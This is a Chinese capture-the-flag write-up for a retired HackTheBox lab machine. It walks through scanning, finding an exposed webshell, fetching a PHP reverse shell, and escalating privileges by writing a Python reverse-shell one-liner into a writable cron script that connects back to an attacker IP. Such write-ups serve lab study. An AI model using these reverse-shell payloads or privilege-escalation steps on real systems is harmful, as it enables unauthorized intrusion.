本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.68
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.68 -o ./Bashed-autorecon
根据上面的扫描结果只开放了一个80端口,然后爆破目录发现了如上一些目录,都访问了以下,其中发现dev这个目录路径下面直接存放了webshell,具体如下
到tmp目录下,使用wget下载一个php反弹shell到本地kali
顺手执行了sudo -l发现存在用户scriptmanager可以无需密码直接切换
通过枚举在运行的进程和间隔的时间戳发现/script下面的存在计划任务,且该目录下的test.py文件含有可写,可改权限,枚举进程的工具:https://github.com/DominicBreuker/pspy
所以直接写入python的反弹shell代码至此文件,然后本地kali监听端口等待反弹shell即可提权,写入反弹shell代码
echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",8833));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > /scripts/test.py
